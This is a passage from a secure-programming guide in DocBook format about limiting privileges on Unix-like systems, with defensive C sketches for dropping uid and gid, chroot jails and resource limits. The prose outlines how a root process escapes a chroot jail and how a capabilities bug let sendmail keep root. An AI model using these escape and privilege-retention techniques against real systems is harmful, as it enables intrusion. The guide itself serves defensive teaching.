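    only_capability(data, cap);
    if (syscall(SYS_capset, &hdr, data) != 0)
        return -1;

    return 0;
}
```
]]></programlisting>

A time daemon could, for instance, call
become_user_keeping(uid, gid, CAP_SYS_TIME) right after startup,
with uid and gid being those of a dedicated pseudouser, and exit
if the call fails.
</para>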

<para>
One tool you can use to simplify minimizing granted privileges
is the ``compartment'' tool developed by SuSE.
This tool, which only works on Linux,
sets the filesystem root, uid, gid, and/or the
capability set, then runs the given program.
This is particularly handy for running some other program without
modifying it.
Here's the syntax of version 0.5:

<screen width="61">

Syntax: compartment [options] /full/path/to/program

Options:
  --chroot path   chroot to path
  --user user     change UID to this user
  --group group   change GID to this group
  --init program  execute this program before doing anything
  --cap capset    set capset name. You can specify several
  --verbose       be verbose
  --quiet         do no logging (to syslog)
</screen>

</para>

<para>
Thus, you could start a more secure anonymous ftp server using:

<screen width="61">
  compartment --chroot /home/ftp --cap CAP_NET_BIND_SERVICE anon-ftpd
</screen>

</para>

<para>
At the time of this writing, the tool is immature and not available on
typical Linux distributions, but this may quickly change.
You can download the program via
<ulink
url="http://www.suse.de/~marc">http://www.suse.de/~marc</ulink>.
A similar tool is dreamland; you can get that at
<ulink url="http://www.7ka.mipt.ru/~szh/dreamland">
http://www.7ka.mipt.ru/~szh/dreamland</ulink>.
</para>


<para>
Note that <emphasis remap="it">not</emphasis> all Unix-like systems
implement POSIX capabilities, and PR_SET_KEEPCAPS is currently
a Linux-only extension.
Thus, these approaches limit portability.
However, if you use them merely as an optional safeguard
where they're available, this
approach will not really limit portability.
<!-- http://faqchest.dynhost.com/linux/KERNEL/kern-00/kern-0004/kern-000433/kern00041117_25233.html -->
<!-- http://www.linuxsecurity.com/feature_stories/kernel-24-security.html -->
Also, while the Linux kernel version 2.2 and greater includes the low-level
calls, the C-level libraries to make their use easy are not installed
on some Linux distributions, slightly complicating their use in applications.
For more information on Linux's implementation of POSIX capabilities, see
<ulink
url="http://linux.kernel.org/pub/linux/libs/security/linux-privs">http://linux.kernel.org/pub/linux/libs/security/linux-privs</ulink>.
</para>

<para>
FreeBSD has the jail() function for limiting privileges;
see the
<ulink url="http://docs.freebsd.org/44doc/papers/jail/jail.html">jail
documentation</ulink>
for more information.
There are a number of specialized tools and extensions for limiting
privileges; see <xref linkend="unix-extensions">.

</para>

</sect2>

<sect2 id="minimize-time-privilege-usable">
<title>Minimize the Time the Privilege Can Be Used</title>

<para>
As soon as possible, permanently give up privileges.
Some Unix-like systems, including Linux,
implement ``saved'' IDs which store the ``previous'' value.
The simplest approach is to reset
any supplemental groups if appropriate (e.g., using setgroups(2)),
and then set the other id's twice to an untrusted id.
In setuid/setgid programs, you should usually set the effective gid and uid
to the real ones, in particular right after a fork(2),
unless there's a good reason not to.
Note that you have to change the gid first when dropping from root to another
privilege or it won't work - once you drop root privileges, you won't
be able to change much else.
Note that in some systems, just setting the group isn't enough, if the
process belongs to supplemental groups with privileges.
For example, the ``rsync'' program didn't remove the supplementary groups
when it changed its uid and gid, which created a potential exploit.
<!--
Here's Mandrake's alert, I should track down the CVE entry:
http://lwn.net/alerts/Mandrake/MDKSA-2002%3A024-1.php3
-->
</para>
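
<para>
A minimal sketch of such a permanent drop follows.
It assumes the process currently has root as its effective user
(a setuid program owned by a non-root user would also have to deal with
its saved ids, which this sketch does not attempt), and the function
name drop_privileges_permanently() is hypothetical.
The point is the ordering (supplementary groups, then gid, then uid)
and the checking of every result.

<programlisting><![CDATA[
```c
#define _DEFAULT_SOURCE          /* for setgroups() on glibc */
#include <grp.h>
#include <sys/types.h>
#include <unistd.h>

/* Permanently switch to (uid, gid).  Returns 0 on success, -1 on failure;
 * on failure the caller should exit rather than continue. */
int drop_privileges_permanently(uid_t uid, gid_t gid)
{
    /* Only root can change supplementary groups; replace the list with
     * just the target group so no privileged group membership survives. */
    if (geteuid() == 0 && setgroups(1, &gid) != 0)
        return -1;

    /* Group ids first: after the uid changes we may lack the right. */
    if (setgid(gid) != 0)
        return -1;
    if (setuid(uid) != 0)
        return -1;

    /* Never assume the calls worked; confirm the ids we now hold. */
    if (getgid() != gid || getegid() != gid)
        return -1;
    if (getuid() != uid || geteuid() != uid)
        return -1;

    return 0;
}
```
]]></programlisting>

</para>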
<!--
To call other programs from setuid programs, use a structure like this
to reduce the privileges for the child:
fork()
if child:
 setgroups(...)     # to set supplementary groups
 setgid(getgid())
 setgid(getgid())   # do it twice to eliminate saved groups
 setuid(getuid())
 setuid(getuid())   # do it twice to eliminate saved uids.
 exec(...)

Note that this isn't approriate for servers working on behalf of another
user, since the current gid/uid is not usually the correct one.
-->

<para>
It's worth noting that there's a well-known related bug that
uses POSIX capabilities to interfere with this minimization.
This bug affects Linux kernel 2.2.0 through 2.2.15, and possibly a number
of other Unix-like systems with POSIX capabilities.
See Bugtraq id 1322 on http://www.securityfocus.com for more information.
Here is their summary:
<blockquote><para>
POSIX "Capabilities" have recently been implemented in the Linux kernel.
These "Capabilities" are an additional form of privilege control to enable
more specific control over what privileged processes can do. Capabilities are
implemented as three (fairly large) bitfields, which each bit representing a
specific action a privileged process can perform. By setting specific bits, the
actions of privileged processes can be controlled -- access can be granted for
various functions only to the specific parts of a program that require them.
It is a security measure. The problem is that capabilities are copied with
fork() execs, meaning that if capabilities are modified by a parent process,
they can be carried over. The way that this can be exploited is by setting all
of the capabilities to zero (meaning, all of the bits are off) in each of the
three bitfields and then executing a setuid program that attempts to drop
privileges before executing code that could be dangerous if run as root, such
as what sendmail does. When sendmail attempts to drop privileges using
setuid(getuid()), it fails not having the capabilities required to do so in its
bitfields and with no checks on its return value . It continues executing with
superuser privileges, and can run a users .forward file as root leading to a
complete compromise.
</para></blockquote>
One approach, used by sendmail, is to attempt to do
setuid(0) after a setuid(getuid()); normally this should fail.
If it succeeds, the program should stop.
For more information, see
http://sendmail.net/?feed=000607linuxbug.
In the short term this might be a good idea in
other programs, though clearly the better
long-term approach is to upgrade the underlying system.
</para>
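
<para>
The check described above could look something like the following
sketch; the function name give_up_root() is hypothetical, and this is
not sendmail's actual code.
It checks the return value of setuid() and then confirms that root
cannot be regained.

<programlisting><![CDATA[
```c
#include <sys/types.h>
#include <unistd.h>

/* Drop to the invoking user and confirm that root is really gone.
 * Returns 0 on success, -1 if the drop failed or can be undone. */
int give_up_root(void)
{
    uid_t real = getuid();

    if (setuid(real) != 0)          /* always check the return value */
        return -1;

    /* If the invoker is not root, regaining root must now be impossible. */
    if (real != 0 && setuid(0) == 0)
        return -1;

    return (geteuid() == real) ? 0 : -1;
}
```
]]></programlisting>

A caller would normally treat any nonzero result as fatal and exit
immediately, before running anything on the user's behalf.
</para>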

</sect2>

<sect2 id="minimize-time-privilege-active">
<title>Minimize the Time the Privilege is Active</title>

<para>
Use setuid(2), seteuid(2), setgroups(2),
and related functions to ensure that the program
only has these privileges active when necessary,
and then temporarily deactivate the privilege when it's not in use.
As noted above, you might want to ensure that these privileges are disabled
while parsing user input, but more generally, only turn on privileges when
they're actually needed.
</para>
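
<para>
As a rough illustration, a setuid program might bracket its privileged
operations with a pair of helpers like these.
The names privilege_suspend() and privilege_resume() are hypothetical,
and the sketch assumes a system with saved user ids, so that the
effective id can be switched back later.

<programlisting><![CDATA[
```c
#include <sys/types.h>
#include <unistd.h>

static uid_t privileged_euid;   /* effective uid the program started with */
static int   privilege_saved;   /* nonzero once privileged_euid is valid  */

/* Deactivate the privilege: run with the real (invoking) user's uid. */
int privilege_suspend(void)
{
    if (!privilege_saved) {
        privileged_euid = geteuid();
        privilege_saved = 1;
    }
    return seteuid(getuid());
}

/* Reactivate the privilege just before the operation that needs it. */
int privilege_resume(void)
{
    if (!privilege_saved)
        return -1;
    return seteuid(privileged_euid);
}
```
]]></programlisting>

The intent is to call privilege_suspend() first thing in main(), and
then to wrap only the few operations that need the privilege in a
privilege_resume() and privilege_suspend() pair, checking both results.
</para>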

<para>
Note that some buffer overflow attacks, if successful, can force a program
to run arbitrary code, and that code could re-enable privileges that were
temporarily dropped.
Thus, there are <emphasis>many</emphasis>
attacks that temporarily deactivating a privilege won't counter -
it's always much better to completely drop privileges as soon as possible.
Many papers describe how attackers do this, such as
<ulink url="http://www.enderunix.org/docs/en/sc-en.txt">"Designing
Shellcode Demystified"</ulink>.
Some people even claim that ``seteuid() [is] considered harmful'' because
of the many attacks it doesn't counter.
Still, temporarily deactivating these permissions
prevents a whole class of attacks,
such as techniques to convince a program to write into a file that
perhaps it didn't intend to write into.
Since this technique prevents many attacks,
it's worth doing if permanently dropping the privilege can't be done
at that point in the program.
</para>

</sect2>

<sect2 id="minimize-privileged-modules">
<title>Minimize the Modules Granted the Privilege</title>

<para>
If only a few modules are granted the privilege, then it's much
easier to determine if they're secure.
One way to do so is to have a single module use the
privilege and then drop it, so that other modules called later cannot misuse
the privilege.
Another approach is to have separate commands in separate
executables; one command might be a complex
tool that can do a vast number of tasks for a privileged user (e.g., root),
while the other tool is setuid but is a small, simple tool that
only permits a small command subset (and does not trust its invoker).
The small, simple tool checks to see if the input meets various criteria for
acceptability, and then if it determines the input is acceptable, it
passes the data on to the complex tool.
Note that the small, simple tool must do a thorough job checking its inputs
and limiting what it will pass along to the complex tool, or this can
be a vulnerability.
The communication could be via shell invocation, or any IPC mechanism.
These approaches can even be layered several ways, for example,
a complex user tool could call a simple setuid
``wrapping'' program (that checks its inputs for secure values)
that then passes on information to another complex trusted tool.
</para>

<para>
This approach is the normal approach for developing GUI-based applications
which require privilege, but must be run by unprivileged users.
The GUI portion is run as a normal unprivileged user process;
that process then passes security-relevant requests on to another process
that has the special privileges (and does not trust the first process, but
instead limits the requests to whatever the user is allowed to do).
Never develop a program that is
privileged (e.g., using setuid) and also directly invokes a graphical toolkit:
Graphical toolkits aren't designed to be used this way, and it would be
extremely difficult to audit graphical toolkits
in a way to make this possible.
Fundamentally, graphical toolkits must be large, and it's extremely
unwise to place so much faith in the perfection of that much code, so
there is no point in trying to make them do what should never be done.
Feel free to create a small setuid program that invokes two separate programs:
one without privileges (but with the graphical interface), and one with
privileges (and without an external interface).
Or, create a small setuid program that can be invoked by the unprivileged
GUI application.
But never combine the two into a single process.
For more about this, see the statement by
<ulink url="http://www.gtk.org/setuid.html">Owen Taylor about GTK
and setuid, discussing why GTK_MODULES is not a security hole</ulink>.
</para>

<para>
Some applications can be best developed by dividing the problem
into smaller, mutually untrusting programs.
A simple way is to divide up the problem into separate programs that
do one thing (securely), using the filesystem and locking to
prevent problems between them.
If more complex interactions are needed, one approach is to
fork into multiple processes, each of which has different privilege.
Communications channels can be set up in a variety of ways; one
way is to have a "master" process create communication channels
(say unnamed pipes or unnamed sockets),
then fork into different processes and have each process
drop as many privileges as possible.
If you're doing this, be sure to watch for deadlocks.
Then use a simple protocol to allow the less trusted processes
to request actions from the more trusted process(es), and ensure that the more
trusted processes only support a limited set of requests.
Setting user and group permissions so that no one else can even start
up the sub-programs makes them harder to break into.
</para>
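
<para>
The following sketch shows the general shape of such a split, using an
unnamed socket pair, one fork, and a one-byte request protocol.
Everything specific here is an assumption made for illustration: the
request codes, the function names serve_request() and run_split(), and
the fact that the worker simply sends a single request.
A strict request-then-reply exchange like this one is also one simple
way to stay clear of deadlocks.

<programlisting><![CDATA[
```c
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

enum { REQ_PING = 1, REQ_STATUS = 2 };   /* the only supported requests */

/* Trusted side: answer only requests on the short allow-list. */
int serve_request(unsigned char req, unsigned char *reply)
{
    switch (req) {
    case REQ_PING:   *reply = 'P'; return 0;
    case REQ_STATUS: *reply = 'S'; return 0;
    default:         return -1;           /* unknown request: refuse */
    }
}

/* Fork a less trusted worker that sends `req` to the trusted parent.
 * Returns 0 if the request was answered, 1 if refused, -1 on error. */
int run_split(unsigned char req)
{
    int sv[2], status, answered;
    unsigned char got, reply;
    pid_t pid;

    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) != 0)
        return -1;

    pid = fork();
    if (pid < 0) {
        close(sv[0]);
        close(sv[1]);
        return -1;
    }

    if (pid == 0) {                       /* less trusted worker */
        unsigned char answer;
        close(sv[0]);
        /* Drop privileges before handling anything untrusted. */
        if (setgid(getgid()) != 0 || setuid(getuid()) != 0)
            _exit(2);
        if (write(sv[1], &req, 1) != 1)
            _exit(2);
        _exit(read(sv[1], &answer, 1) == 1 ? 0 : 1);
    }

    /* More trusted parent: one request in, at most one reply out. */
    close(sv[1]);
    answered = read(sv[0], &got, 1) == 1 &&
               serve_request(got, &reply) == 0 &&
               write(sv[0], &reply, 1) == 1;
    close(sv[0]);                         /* worker sees EOF if refused */

    if (waitpid(pid, &status, 0) != pid)
        return -1;
    return answered ? 0 : 1;
}
```
]]></programlisting>

</para>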

<para>
Some operating systems have the concept of multiple
layers of trust in a single process, e.g., Multics' rings.
Standard Unix and Linux don't have a way of separating multiple levels of trust
by function inside a single process
like this; a call to the kernel increases privileges,
but otherwise a given process has a single level of trust.
This is one area where technologies like Java 2, C# (which copies
Java's approach), and
Fluke (the basis of security-enhanced Linux) have an advantage.
For example,
Java 2 can specify fine-grained permissions such as the permission to
only open a specific file.
However, general-purpose operating systems do not typically
have such abilities at this time; this may change in the near future.
For more about Java, see <xref linkend="java">.
</para>

</sect2>

<sect2 id="consider-fsuid">
<title>Consider Using FSUID To Limit Privileges</title>

<para>
Each Linux process has two Linux-unique state values called
filesystem user id (FSUID) and filesystem group id (FSGID).
These values are used when checking against the filesystem permissions.
If you're building a program that operates as a file server for arbitrary
users (like an NFS server), you might consider using these Linux extensions.
To use them, while holding root privileges change
just FSUID and FSGID before accessing files on behalf of a normal user.
This extension is fairly useful, and provides a mechanism for limiting
filesystem access rights without removing other (possibly necessary) rights.
By only setting the FSUID (and not the EUID), a local user cannot send
a signal to the process.
Also, avoiding race conditions is much easier in this situation.
However, a disadvantage of this approach
is that these calls are not portable to other Unix-like systems.
</para>
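
<para>
As a hedged sketch, a file server might open a file on a user's behalf
roughly like this.
The function name open_as_user() is hypothetical.
Because setfsuid(2) and setfsgid(2) return the previous id rather than
an error indication, the sketch calls each a second time to confirm
that the change took effect.

<programlisting><![CDATA[
```c
#include <fcntl.h>
#include <sys/fsuid.h>
#include <sys/types.h>
#include <unistd.h>

/* Open `path` read-only with the filesystem identity of (uid, gid).
 * Returns a file descriptor, or -1 on failure. */
int open_as_user(const char *path, uid_t uid, gid_t gid)
{
    int fd = -1;
    /* These calls return the previous id and report no errors. */
    int old_fsgid = setfsgid(gid);
    int old_fsuid = setfsuid(uid);

    /* Calling again returns the id now in force, confirming the change. */
    if ((gid_t)setfsgid(gid) == gid && (uid_t)setfsuid(uid) == uid)
        fd = open(path, O_RDONLY);

    /* Restore the server's own filesystem identity. */
    setfsuid(old_fsuid);
    setfsgid(old_fsgid);
    return fd;
}
```
]]></programlisting>

</para>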

</sect2>

<sect2 id="consider-chroot">
<title>Consider Using Chroot to Minimize Available Files</title>

<para>
You can use chroot(2) to limit the files visible to your program.
This requires carefully setting up a directory (called the ``chroot jail'')
and correctly entering it.
This can be a fairly effective technique for improving a program's
security - it's hard to interfere with files you can't see.
However, it depends on a whole bunch of assumptions, in particular,
the program must lack root privileges, it must not have any way to get
root privileges, and the chroot jail must be properly set up
(e.g., be careful what you put inside the chroot jail, and make sure that
users can never control its contents before calling chroot).
I recommend using chroot(2) where it makes sense to do so, but don't depend
on it alone; instead, make it part of a layered set of defenses.
Here are a few notes about the use of chroot(2):

<itemizedlist>
<listitem>

<para>
The program can still use non-filesystem objects that are shared
across the entire machine
(such as System V IPC objects and network sockets).
It's best to also
use separate pseudo-users and/or groups, because all Unix-like systems include
the ability to isolate users; this will at least limit the damage
a subverted program can do to other programs.
Note that most current Unix-like systems (including Linux)
won't isolate intentionally cooperating programs; if you're worried about
malicious programs cooperating, you need to get a system that implements
some sort of mandatory access control and/or limits covert channels.
</para>
</listitem>
<listitem>

<para>
Be sure to close any file descriptors to outside files if you
don't want them used later.
In particular, don't have any descriptors open to directories outside
the chroot jail, or set up a situation where such a descriptor could be
given to it (e.g., via Unix sockets or an old implementation of /proc).
If the program is given a descriptor to a directory outside the chroot jail,
it could be used to escape out of the chroot jail.
</para>
</listitem>
<listitem>

<para>
The chroot jail has to be set up to be secure - it must never be
controlled by a user and every file added must be carefully examined.
Don't use a normal user's home directory, subdirectory, or
other directory that can ever be controlled by a user as a chroot jail;
use a separate directory specially set aside
for the purpose.
<!-- http://msgs.securepoint.com/cgi-bin/get/bugtraq0004/64/1/1/2.html -->
<!--
http://marc.theaimsgroup.com/?l=qmail&m=100128344722211&w=2
-->
Using a directory controlled by a user is a disaster - for example,
the user could create a ``lib'' directory containing a trojaned linker or libc
(and could link a setuid root binary into that space, if the files you
save don't use it).
Place the absolute minimum number of files and directories there.
Typically you'll have a /bin, /etc/, /lib, and maybe one or two others
(e.g., /pub if it's an ftp server).
Place in /bin only what you need to run after doing the chroot(); sometimes
you need nothing at all (try to avoid placing a shell like /bin/sh
there, though sometimes that can't be helped).
You may need a /etc/passwd and /etc/group so file listings can show
some correct names, but if so, try not to include the real system's
values, and certainly replace all passwords with "*".
</para>

<para>
In /lib, place only what you need; use ldd(1) to query each program in /bin
to find out what it needs, and include only those libraries.
On Linux, you'll probably need a few basic libraries like ld-linux.so.2, and
not much else.
Alternatively, recompile any necessary programs to be statically linked,
so that they
don't need dynamically loaded libraries at all.
</para>

<para>
It's usually wiser to completely copy in all files, instead of making
hard links; while this wastes some time and disk space, it makes it so that
attacks on the chroot jail files do not automatically propagate into the
regular system's files.
Mounting a /proc filesystem, on systems where this is supported, is
generally unwise. In fact, in very old versions of Linux (versions 2.0.x,
at least up through 2.0.38) it's a
known security flaw, since there are pseudo-directories in /proc that
would permit a chroot'ed program to escape.
Linux kernel 2.2 fixed this known problem, but there may be others; if
possible, don't do it.
</para>

</listitem>
<listitem>

<para>
Chroot really isn't effective if
the program can acquire root privilege.
For example, the program could use calls like mknod(2) to create a device
file that can view physical memory, and then use the resulting
device file to modify kernel memory to give itself
whatever privileges it desired.
Another example of how a root program can break out of chroot
is demonstrated at
<ulink
url="http://www.suid.edu/source/breakchroot.c">http://www.suid.edu/source/breakchroot.c</ulink>.
In this example, the program opens a file descriptor for
the current directory, creates and chroots into a subdirectory, sets
the current directory to the previously-opened current directory,
repeatedly cd's up from the current directory (which since it is
outside the current chroot succeeds in moving up to the real filesystem
root), and then calls chroot on the result.
By the time you read this, these weaknesses may have been plugged,
but the reality is that root privilege has traditionally meant ``all
privileges'' and it's hard to strip them away.
It's better to assume that a program requiring continuous root privileges
will only be mildly helped by using chroot().
Of course, you may be able to break your program into parts, so that
at least part of it can be in a chroot jail.
</para>
</listitem>

</itemizedlist>

</para>
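
<para>
Putting these notes together, entering a chroot jail correctly might
look something like the sketch below.
The function name enter_jail() is hypothetical, and the sketch assumes
that the caller has already closed any descriptors that refer to
files or directories outside the jail.
It changes into the jail before calling chroot(2), and gives up root
immediately afterwards, since a jailed process that keeps root
privileges is not really confined.

<programlisting><![CDATA[
```c
#define _DEFAULT_SOURCE          /* for chroot() and setgroups() on glibc */
#include <grp.h>
#include <sys/types.h>
#include <unistd.h>

/* Enter the jail at `dir`, then permanently become (uid, gid).
 * Returns 0 on success, -1 on failure (the caller should then exit). */
int enter_jail(const char *dir, uid_t uid, gid_t gid)
{
    /* Move into the jail first so the working directory cannot be left
     * pointing outside it. */
    if (chdir(dir) != 0)
        return -1;
    if (chroot(".") != 0)
        return -1;
    if (chdir("/") != 0)
        return -1;

    /* chroot() needs root, so shed root only now, groups first. */
    if (setgroups(1, &gid) != 0 || setgid(gid) != 0 || setuid(uid) != 0)
        return -1;

    /* A jailed process must not still be root. */
    if (getuid() == 0 || geteuid() == 0)
        return -1;
    return 0;
}
```
]]></programlisting>

</para>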

</sect2>
<sect2 id="minimize-accessible-data">
<title>Consider Minimizing the Accessible Data</title>

<para>
Consider minimizing the amount of data that can be accessed by the user.
For example, in CGI scripts, place all data used by the CGI script
outside of the document tree unless there is a reason the user needs to
see the data directly.
Some people have the false notion that, by not publicly providing a
link, no one can access the data, but this is simply not true.
</para>

</sect2>

<sect2 id="minimize-resources">
<title>Consider Minimizing the Resources Available</title>
<para>
Consider minimizing the computer resources available to a given
process so that, even if it ``goes haywire,'' its damage can be limited.
This is a fundamental technique for preventing a denial of service.
For network servers,
a common approach is to set up a separate process for each session,
and for each process limit the amount of CPU time (et cetera) that session
can use.
That way, if an attacker makes a request that chews up memory or uses
100% of the CPU, the limits will kick in and prevent that single session
from interfering with other tasks.
Of course, an attacker can establish many sessions, but this at least
raises the bar for an attack.
See <xref linkend="quotas"> for more information on how to set these limits
(e.g., ulimit(1)).
</para>
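
<para>
For example, a per-session process could lower its own limits with
setrlimit(2) before handling any requests.
The sketch below is only illustrative: the function names
lower_limit() and limit_session() are hypothetical, and the particular
numbers are placeholders that a real server would have to choose for
itself.

<programlisting><![CDATA[
```c
#include <sys/resource.h>

/* Lower both the soft and hard limit for `resource` to at most `value`.
 * Limits are never raised.  Returns 0 on success, -1 on failure. */
int lower_limit(int resource, rlim_t value)
{
    struct rlimit lim;

    if (getrlimit(resource, &lim) != 0)
        return -1;
    if (lim.rlim_max > value)
        lim.rlim_max = value;
    if (lim.rlim_cur > lim.rlim_max)
        lim.rlim_cur = lim.rlim_max;
    return setrlimit(resource, &lim);
}

/* Limits for one session's process; the numbers are placeholders. */
int limit_session(void)
{
    if (lower_limit(RLIMIT_CPU, 30) != 0)                   /* seconds     */
        return -1;
    if (lower_limit(RLIMIT_AS, 256UL * 1024 * 1024) != 0)   /* bytes       */
        return -1;
    if (lower_limit(RLIMIT_NOFILE, 64) != 0)                /* descriptors */
        return -1;
    return 0;
}
```
]]></programlisting>

Because the hard limits are lowered too, an unprivileged session
process cannot raise them again later.
</para>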
</sect2>

</sect1>

<sect1 id="minimize-functionality">
<title>Minimize the Functionality of a Component</title>
<para>
In a related move, minimize the amount of functionality provided by
your component.
If it does several functions, consider breaking its implementation up into
those smaller functions.
That way, users who don't need some functions can disable just those portions.
This is particularly important when a flaw is discovered - this way, users
can disable just one component and still use the other parts.
</para>
</sect1>

<sect1 id="avoid-setuid">
<title>Avoid Creating Setuid/Setgid Scripts</title>
<para>
Many Unix-like systems, in particular Linux, simply ignore the
setuid and setgid bits on scripts to avoid the race condition
described earlier.
Since support for setuid scripts varies on Unix-like systems,
they're best avoided in new applications where possible.
As a special case, Perl includes a special setup to support setuid Perl
scripts, so using setuid and setgid is acceptable in Perl if you
truly need this kind of functionality.
If you need to support this kind of functionality in your own
interpreter, examine how Perl does this.
Otherwise, a simple approach is to ``wrap'' the script with a small
setuid/setgid executable that creates a safe environment
(e.g., clears and sets environment variables) and then
calls the script (using the script's full path).
Make sure that the script cannot be changed by an attacker!
Shell scripting languages have additional problems, and really should
not be setuid/setgid; see <xref linkend="shell">
for more information about this.
</para>
</sect1>

<sect1 id="safe-configure">
<title>Configure Safely and Use Safe Defaults</title>

<para>
Configuration is currently considered to be the number one security problem.
Therefore, you should spend some effort to (1) make the initial installation
secure, and (2) make it easy to reconfigure the system while keeping it secure.
</para>

<para>
Never have the installation routines install a working ``default'' password.
If you need to install new ``users'', that's fine - just set them up with
an impossible password, leaving time for administrators to set the password
(and leaving the system secure before the password is set).
Administrators will probably install hundreds of packages and almost
certainly forget to set the password - it's likely they won't even know
to set it, if you create a default password.
<!-- This has hurt many a system, for example,
Red Hat did this with the ``piranha'' package (it was widely denounced
in April 1999), and Microsoft did this with SQL Server 7.0 when running
in ``mixed mode''. -->
<!-- http://slashdot.org/articles/00/08/21/0759251.shtml,
http://www.securityfocus.com/frames/?content=/templates/archive.pike%3Flist%3D1%26date%3D2000-08-15%26msg%3DB9D1827FDF66D111925800805F3102E31E7AAB6E%40RED-MSG-57 -->
</para>

<para>
A program should have the most restrictive access policy
until the administrator has a chance to configure it.
Please don't create ``sample'' working users or
``allow access to all'' configurations as the starting configuration;
many users just ``install everything'' (installing all available services)
and never get around to configuring many services.
In some cases the program may be able to determine that a more generous
policy is reasonable by depending on the existing authentication system;
for example, an ftp server could legitimately determine that a user who
can log into a user's directory should be allowed to access that user's files.
Be careful with such assumptions, however.
</para>

<para>
Have installation scripts install a program as safely as possible.
By default, install all files as owned by root or some other
system user and make them unwriteable by others;
this prevents non-root users from installing viruses.
Indeed, it's best to make them unreadable by all but the trusted user.
Allow non-root installation where possible as well, so that users without
root privileges and administrators who do not fully trust the
installer can still use the program.
</para>

<para>
When installing, check to make sure that any assumptions necessary for
security are true.
Some library routines are not safe on some platforms; see the discussion of
this in <xref linkend="call-only-safe">.
If you know which platforms your application will run on, you need not
check their specific attributes, but in that case you should
check to make sure that the program is being installed on only one of
those platforms.
Otherwise, you should require a manual override to install the program,
because you don't know if the result will be secure.
</para>

<para>
Try to make configuration as easy and clear as possible, including
post-installation configuration.
Make using the ``secure'' approach as easy as possible, or many users
will use an insecure approach without understanding the risks.
On Linux,
take advantage of tools like linuxconf, so that users can easily configure
their system using an existing infrastructure.
</para>

<para>
If there's a configuration language, the default should be to deny access
until the user specifically grants it.
Include many clear comments in the sample configuration file, if there is one,
so the administrator understands what the configuration does.
</para>

</sect1>


<sect1 id="init-safe">
<title>Load Initialization Values Safely</title>

<para>
Many programs read an initialization file to allow their defaults to be
configured.
You must ensure that an attacker can't change which initialization file
is used, nor create or modify that file.
Often you should <emphasis>not</emphasis> use the current directory
as a source of this information, since if the program is used as an
editor or browser, the user may be viewing the directory controlled
by someone else.
<!-- Joe had this problem: http://lwn.net/2001/0301/a/sec-joe.php3 -->
Instead, if the program is a typical user application, you should load
any user defaults from a hidden file or directory contained in the user's
home directory.
If the program is setuid/setgid, don't read any file controlled by the
user unless you carefully filter it as an untrusted (potentially
hostile) input.
Trusted configuration values should be loaded from somewhere else
entirely (typically from a file in /etc).
</para>
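<para>
For a typical user application, locating the per-user initialization file
might look something like the sketch below.
The function name user_config_path is hypothetical, and taking the home
directory from the password database (rather than from the HOME
environment variable or the current directory) is a design choice made
for this example, not something every program must do.
</para>
<programlisting><![CDATA[
```c
#include <pwd.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/* Write "<home>/.<name>" into buf, where <home> is the home directory
 * recorded in the password database for the real user id.
 * Returns 0 on success, -1 on any failure (in which case the caller
 * should simply load no user defaults). */
int user_config_path(char *buf, size_t buflen, const char *name)
{
    struct passwd *pw = getpwuid(getuid());
    int n;

    if (pw == NULL || pw->pw_dir == NULL || pw->pw_dir[0] != '/')
        return -1;

    n = snprintf(buf, buflen, "%s/.%s", pw->pw_dir, name);
    if (n < 0 || (size_t)n >= buflen)
        return -1;              /* path did not fit; never use a truncated name */
    return 0;
}
```
]]></programlisting>
<para>
A setuid/setgid program would still have to treat the contents of such a
file as untrusted input, as noted above.
</para>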
</sect1>


<sect1 id="fail-safe">
<title>Fail Safe</title>

<para>
A secure program should always ``fail safe'', that is,
it should be designed so that if the program does fail, the safest
result should occur.
For security-critical programs, that usually means that
if some sort of misbehavior is detected (malformed input,
reaching a ``can't get here'' state, and so on), then the program
should immediately deny service and stop processing that request.
Don't try to ``figure out what the user wanted'': just deny the service.
Sometimes this can decrease reliability or usability
(from a user's perspective), but it increases security.
There are a few cases where this might not be desired (e.g., where denial of
service is much worse than loss of confidentiality or integrity), but
such cases are quite rare.
</para>

<para>
Note that I recommend ``stop processing the request'', not ``fail altogether''.
In particular, most servers should not completely halt when given malformed
input, because that creates a trivial opportunity for a denial of service
attack (the attacker just sends garbage bits to prevent you from using the
service).
Sometimes taking the whole server down is necessary; in particular,
reaching some ``can't get here'' states may signal a problem so drastic
that continuing is unwise.
</para>

<para>
Consider carefully what error message you send back when a failure is detected.
If you send nothing
back, it may be hard to diagnose problems, but sending back too much
information may unintentionally aid an attacker.
Usually the best approach is to reply with ``access denied'' or
``miscellaneous error encountered'' and then
write more detailed information to an audit log (where you can have more
control over who sees the information).
</para>
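<para>
One way to separate the two audiences is sketched below: the client
receives only a generic reply, while the details go to the system log
through syslog(3).
The function name deny_request, the reply text, and the LOG_AUTH facility
are assumptions for this example.
</para>
<programlisting><![CDATA[
```c
#include <sys/types.h>
#include <syslog.h>
#include <unistd.h>

/* Refuse the current request: log the detailed reason privately and
 * send the client a deliberately uninformative message.
 * Returns 0 if the reply was written in full, -1 otherwise. */
int deny_request(int client_fd, const char *detail)
{
    static const char reply[] = "access denied\n";
    ssize_t n;

    /* The fixed "%s" format keeps attacker-influenced text in detail
     * from being interpreted as a format string. */
    syslog(LOG_AUTH | LOG_WARNING, "request denied: %s", detail);

    n = write(client_fd, reply, sizeof reply - 1);
    return (n == (ssize_t)(sizeof reply - 1)) ? 0 : -1;
}
```
]]></programlisting>
<para>
After calling such a routine the server stops processing that request,
but it keeps serving others.
</para>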

</sect1>

<sect1 id="avoid-race">
<title>Avoid Race Conditions</title>

<para>
A ``race condition'' can be defined as
``Anomalous behavior due to unexpected critical dependence
on the relative timing of events''
[FOLDOC].
Race conditions generally involve one or more processes
accessing a shared resource (such as a file or variable), where this
multiple access has not been properly controlled.
</para>

<para>
In general, a process does not execute atomically;
another process may interrupt it between essentially any two instructions.
If a secure program's process is not prepared for these interruptions,
another process may be able to interfere with the secure program's process.
Any pair of operations in a secure program must still work correctly
if an arbitrary amount of another process's code is executed between them.
</para>

<para>
Race condition problems can be notionally divided into two categories:
<itemizedlist>
<listitem><para>
Interference caused by untrusted processes.
Some security taxonomies call this problem a
``sequence'' or ``non-atomic'' condition.
These are conditions caused by processes running other, different programs,
which ``slip in'' other actions between steps of the secure program.
These other programs might be invoked by an attacker specifically
to cause the problem.
This book will call these sequencing problems.
</para></listitem>
<listitem><para>
Interference caused by trusted processes (from the secure program's
point of view).
Some taxonomies call these deadlock, livelock, or locking failure conditions.
These are conditions caused by processes running the ``same'' program.
